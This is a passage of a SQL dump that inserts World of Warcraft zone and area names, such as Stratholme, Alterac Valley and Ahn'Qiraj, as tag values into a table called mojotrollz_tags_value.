`value`, `description`) VALUES (2252, 2, 'The Ruins of Kel\'Theril', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (2253, 2, 'Starfall Village', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (2254, 2, 'Ban\'Thallow Barrow Den', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (2255, 2, 'Everlook', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (2256, 2, 'Darkwhisper Gorge', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (2257, 2, 'Deeprun Tram', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (2258, 2, 'The Fungal Vale', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (2259, 2, 'The Marris Stead', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (2260, 2, 'The Marris Stead', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (2261, 2, 'The Undercroft', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (2262, 2, 'Darrowshire', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (2263, 2, 'Crown Guard Tower', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (2264, 2, 'Corin\'s Crossing', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (2265, 2, 'Scarlet Base Camp', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (2266, 2, 'Tyr\'s Hand', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (2267, 2, 'The Scarlet Basilica', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (2268, 2, 'Light\'s Hope Chapel', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (2269, 2, 'Browman Mill', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (2270, 2, 'The Noxious Glade', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (2271, 2, 'Eastwall Tower', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (2272, 2, 'Northdale', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (2273, 2, 'Zul\'Mashar', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (2274, 2, 'Mazra\'Alor', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (2275, 2, 'Northpass Tower', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (2276, 2, 'Quel\'Lithien Lodge', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (2277, 2, 'Plaguewood', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (2278, 2, 'Scourgehold', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (2279, 2, 'Stratholme', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (2280, 2, 'Stratholme', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (2297, 2, 'Darrowmere Lake', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (2298, 2, 'Caer Darrow', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (2299, 2, 'Darrowmere Lake', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (2300, 2, 'Caverns of Time', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (2301, 2, 'Thistlefur Village', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (2302, 2, 'The Quagmire', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (2303, 2, 'Windbreak Canyon', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (2317, 2, 'South Seas', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (2318, 2, 'The Great Sea', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (2319, 2, 'The Great Sea', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (2320, 2, 'The Great Sea', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (2321, 2, 'The Great Sea', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (2322, 2, 'The Veiled Sea', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (2323, 2, 'The Veiled Sea', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (2324, 2, 'The Veiled Sea', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (2325, 2, 'The Veiled Sea', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (2326, 2, 'The Veiled Sea', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (2337, 2, 'Razor Hill Barracks', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (2338, 2, 'South Seas', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (2339, 2, 'The Great Sea', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (2357, 2, 'Bloodtooth Camp', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (2358, 2, 'Forest Song', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (2359, 2, 'Greenpaw Village', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (2360, 2, 'Silverwing Outpost', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (2361, 2, 'Nighthaven', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (2362, 2, 'Shrine of Remulos', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (2363, 2, 'Stormrage Barrow Dens', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (2364, 2, 'The Great Sea', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (2365, 2, 'The Great Sea', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (2366, 2, 'The Black Morass', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (2367, 2, 'Old Hillsbrad Foothills', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (2368, 2, 'Tarren Mill', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (2369, 2, 'Southshore', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (2370, 2, 'Durnholde Keep', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (2371, 2, 'Dun Garok', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (2372, 2, 'Hillsbrad Fields', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (2373, 2, 'Eastern Strand', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (2374, 2, 'Nethander Stead', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (2375, 2, 'Darrow Hill', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (2376, 2, 'Southpoint Tower', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (2377, 2, 'Thoradin\'s Wall', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (2378, 2, 'Western Strand', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (2379, 2, 'Azurelode Mine', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (2397, 2, 'The Great Sea', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (2398, 2, 'The Great Sea', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (2399, 2, 'The Great Sea', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (2400, 2, 'The Forbidding Sea', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (2401, 2, 'The Forbidding Sea', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (2402, 2, 'The Forbidding Sea', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (2403, 2, 'The Forbidding Sea', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (2404, 2, 'Tethris Aran', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (2405, 2, 'Ethel Rethor', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (2406, 2, 'Ranazjar Isle', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (2407, 2, 'Kormek\'s Hut', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (2408, 2, 'Shadowprey Village', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (2417, 2, 'Blackrock Pass', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (2418, 2, 'Morgan\'s Vigil', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (2419, 2, 'Slither Rock', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (2420, 2, 'Terror Wing Path', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (2421, 2, 'Draco\'dar', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (2437, 2, 'Ragefire Chasm', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (2457, 2, 'Nightsong Woods', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (2477, 2, 'The Veiled Sea', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (2478, 2, 'Morlos\'Aran', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (2479, 2, 'Emerald Sanctuary', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (2480, 2, 'Jadefire Glen', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (2481, 2, 'Ruins of Constellas', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (2497, 2, 'Bitter Reaches', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (2517, 2, 'Rise of the Defiler', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (2518, 2, 'Lariss Pavilion', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (2519, 2, 'Woodpaw Hills', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (2520, 2, 'Woodpaw Den', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (2521, 2, 'Verdantis River', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (2522, 2, 'Ruins of Isildien', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (2537, 2, 'Grimtotem Post', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (2538, 2, 'Camp Aparaje', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (2539, 2, 'Malaka\'jin', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (2540, 2, 'Boulderslide Ravine', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (2541, 2, 'Sishir Canyon', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (2557, 2, 'Dire Maul', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (2558, 2, 'Deadwind Ravine', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (2559, 2, 'Diamondhead River', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (2560, 2, 'Ariden\'s Camp', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (2561, 2, 'The Vice', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (2562, 2, 'Karazhan', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (2563, 2, 'Morgan\'s Plot', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (2577, 2, 'Dire Maul', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (2597, 2, 'Alterac Valley', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (2617, 2, 'Scrabblescrew\'s Camp', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (2618, 2, 'Jadefire Run', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (2619, 2, 'Thondroril River', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (2620, 2, 'Thondroril River', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (2621, 2, 'Lake Mereldar', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (2622, 2, 'Pestilent Scar', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (2623, 2, 'The Infectis Scar', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (2624, 2, 'Blackwood Lake', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (2625, 2, 'Eastwall Gate', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (2626, 2, 'Terrorweb Tunnel', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (2627, 2, 'Terrordale', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (2637, 2, 'Kargathia Keep', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (2657, 2, 'Valley of Bones', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (2677, 2, 'Blackwing Lair', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (2697, 2, 'Deadman\'s Crossing', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (2717, 2, 'Molten Core', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (2737, 2, 'The Scarab Wall', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (2738, 2, 'Southwind Village', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (2739, 2, 'Twilight Base Camp', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (2740, 2, 'The Crystal Vale', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (2741, 2, 'The Scarab Dais', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (2742, 2, 'Hive\'Ashi', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (2743, 2, 'Hive\'Zora', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (2744, 2, 'Hive\'Regal', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (2757, 2, 'Shrine of the Fallen Warrior', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (2777, 2, 'Alterac Valley', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (2797, 2, 'Blackfathom Deeps', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (2837, 2, 'The Master\'s Cellar', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (2838, 2, 'Stonewrought Pass', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (2839, 2, 'Alterac Valley', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (2857, 2, 'The Rumble Cage', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (2877, 2, 'Chunk Test', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (2897, 2, 'Zoram\'gar Outpost', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (2917, 2, 'Hall of Legends', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (2918, 2, 'Champions\' Hall', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (2937, 2, 'Grosh\'gok Compound', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (2938, 2, 'Sleeping Gorge', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (2957, 2, 'Irondeep Mine', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (2958, 2, 'Stonehearth Outpost', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (2959, 2, 'Dun Baldar', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (2960, 2, 'Icewing Pass', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (2961, 2, 'Frostwolf Village', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (2962, 2, 'Tower Point', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (2963, 2, 'Coldtooth Mine', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (2964, 2, 'Winterax Hold', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (2977, 2, 'Iceblood Garrison', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (2978, 2, 'Frostwolf Keep', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (2979, 2, 'Tor\'kren Farm', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (3017, 2, 'Frost Dagger Pass', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (3037, 2, 'Ironstone Camp', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (3038, 2, 'Weazel\'s Crater', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (3039, 2, 'Tahonda Ruins', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (3057, 2, 'Field of Strife', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (3058, 2, 'Icewing Cavern', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (3077, 2, 'Valor\'s Rest', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (3097, 2, 'The Swarming Pillar', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (3098, 2, 'Twilight Post', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (3099, 2, 'Twilight Outpost', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (3100, 2, 'Ravaged Twilight Camp', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (3117, 2, 'Shalzaru\'s Lair', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (3137, 2, 'Talrendis Point', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (3138, 2, 'Rethress Sanctum', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (3139, 2, 'Moon Horror Den', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (3140, 2, 'Scalebeard\'s Cave', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (3157, 2, 'Boulderslide Cavern', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (3177, 2, 'Warsong Labor Camp', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (3197, 2, 'Chillwind Camp', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (3217, 2, 'The Maul', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (3237, 2, 'The Maul', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (3257, 2, 'Bones of Grakkarond', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (3277, 2, 'Warsong Gulch', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (3297, 2, 'Frostwolf Graveyard', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (3298, 2, 'Frostwolf Pass', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (3299, 2, 'Dun Baldar Pass', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (3300, 2, 'Iceblood Graveyard', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (3301, 2, 'Snowfall Graveyard', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (3302, 2, 'Stonehearth Graveyard', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (3303, 2, 'Stormpike Graveyard', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (3304, 2, 'Icewing Bunker', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (3305, 2, 'Stonehearth Bunker', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (3306, 2, 'Wildpaw Ridge', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (3317, 2, 'Revantusk Village', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (3318, 2, 'Rock of Durotan', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (3319, 2, 'Silverwing Grove', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (3320, 2, 'Warsong Lumber Mill', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (3321, 2, 'Silverwing Hold', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (3337, 2, 'Wildpaw Cavern', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (3338, 2, 'The Veiled Cleft', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (3357, 2, 'Yojamba Isle', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (3358, 2, 'Arathi Basin', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (3377, 2, 'The Coil', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (3378, 2, 'Altar of Hir\'eek', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (3379, 2, 'Shadra\'zaar', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (3380, 2, 'Hakkari Grounds', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (3381, 2, 'Naze of Shirvallah', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (3382, 2, 'Temple of Bethekk', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (3383, 2, 'The Bloodfire Pit', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (3384, 2, 'Altar of the Blood God', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (3397, 2, 'Zanza\'s Rise', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (3398, 2, 'Edge of Madness', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (3417, 2, 'Trollbane Hall', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (3418, 2, 'Defiler\'s Den', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (3419, 2, 'Pagle\'s Pointe', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (3420, 2, 'Farm', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (3421, 2, 'Blacksmith', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (3422, 2, 'Lumber Mill', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (3423, 2, 'Gold Mine', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (3424, 2, 'Stables', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (3425, 2, 'Cenarion Hold', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (3426, 2, 'Staghelm Point', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (3427, 2, 'Bronzebeard Encampment', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (3428, 2, 'Ahn\'Qiraj', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (3429, 2, 'Ruins of Ahn\'Qiraj', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (3430, 2, 'Eversong Woods', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (3431, 2, 'Sunstrider Isle', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (3432, 2, 'Shrine of Dath\'Remar', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (3433, 2, 'Ghostlands', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (3434, 2, 'Scarab Terrace', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (3435, 2, 'General\'s Terrace', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (3436, 2, 'The Reservoir', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (3437, 2, 'The Hatchery', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (3438, 2, 'The Comb', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (3439, 2, 'Watchers\' Terrace', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES (3440, 2, 'Scarab Terrace', ''); INSERT INTO `mojotrollz_tags_value` (`id`, `type`, `value`, `description`) VALUES 